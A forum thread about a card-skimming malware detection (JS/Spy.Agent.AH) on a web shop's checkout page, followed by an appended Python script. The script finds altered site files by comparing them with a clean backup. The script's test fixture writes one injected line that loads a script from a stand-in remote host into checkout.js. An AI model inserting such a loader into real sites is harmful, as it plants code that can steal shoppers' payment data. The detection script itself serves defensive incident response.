mpower

JS/Spy.Agent.AH found - but where?


In Chrome and Opera (not in Firefox) the JS/Spy.Agent.AH malware is being found by ESET. The malware was found in https://example.com/checkout/onepage/, so it does not say in which file. How do I know where the malware is hidden? Any advice?

This is what it looks like in the logs: leSv31t.png

Thanks!


It should be exactly that page. However, I'm getting 404 "page not found" when trying to download it.


Yeah, it's not the real domain, I changed it :-). Is the malware in a JS file or could it also be PHP?


The website is really infected. In this case, the malicious JS is detected by several AVs, not only by ESET:

image.png


Alright, can you give me a hint how to get the infected files?

 

Thanks!

52 minutes ago, mpower said:

Alright, can you give me a hint how to get the infected files?

Why in the world would you want to do this?


Are you an administrator of the website?


Yes, I am the site's admin (should have mentioned that 😀) and I want to replace the infected files with the non-infected version. If I knew the paths to the file(s) it would be no problem ...

Edited by mpower


I took a code backup and deleted the old code which made it work again.

Thanks for your answers guys

57 minutes ago, mpower said:

I took a code backup and deleted the old code which made it work again.

Thanks for your answers guys

There should be a JS reference in your code that is linking to another script from another place where your detection has triggered, or it's hosted on your website, which means they can access and upload files to the server.

You should secure the server more, so you can make sure that they cannot inject a JS again.


Yeah, I told my customer to change FTP/SSH and database passwords already ...

Thanks!
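
One way to find the file paths asked about earlier in the thread, as an added example that is not part of any poster's reply: hash every web-served source file in the live web root against a known-clean copy, and for each added or modified file list the remote hosts its `src=` references point to. The directory layout, the `own_hosts` allowlist, the extension list and the sample trees are assumptions constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

WEB_EXT = {".js", ".php", ".phtml", ".html", ".htm"}
# src="..." in markup or x.src = "..." in script; absolute or protocol-relative URLs only
REMOTE_SRC = re.compile(r"""\bsrc\s*=\s*["']((?:https?:)?//[^"']+)["']""", re.I)

def index(root):
    """Map relative path -> Path for every web-served source file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*")
            if p.is_file() and p.suffix.lower() in WEB_EXT}

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def remote_hosts(path, own_hosts):
    """Hosts referenced by src= attributes or assignments that are not the site's own."""
    text = path.read_text(encoding="utf-8", errors="replace")
    hosts = {urlparse(u).hostname for u in REMOTE_SRC.findall(text)}
    return sorted(h for h in hosts if h and h not in own_hosts)

def compare(live_root, clean_root, own_hosts=()):
    """Return (path, status, unexpected hosts) for files added or changed vs. the clean copy."""
    live, clean = index(live_root), index(clean_root)
    findings = []
    for rel, path in sorted(live.items()):
        if rel not in clean:
            status = "added"
        elif digest(path) != digest(clean[rel]):
            status = "modified"
        else:
            continue
        findings.append((rel, status, remote_hosts(path, set(own_hosts))))
    return findings

if __name__ == "__main__":
    # Constructed sample trees: a clean backup and a live copy with one altered file.
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for d in (clean, live):
            (d / "js").mkdir(parents=True)
            (d / "js" / "checkout.js").write_text("function pay(){}\n")
        with (live / "js" / "checkout.js").open("a") as f:
            f.write('var s=document.createElement("script");s.src="//cdn.invalid/x.js";\n')
        for row in compare(live, clean, own_hosts={"example.com"}):
            print(row)
```

Files reported as "added" with no counterpart in the clean copy deserve the same attention as modified ones, since an uploaded file never shows up as a diff.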
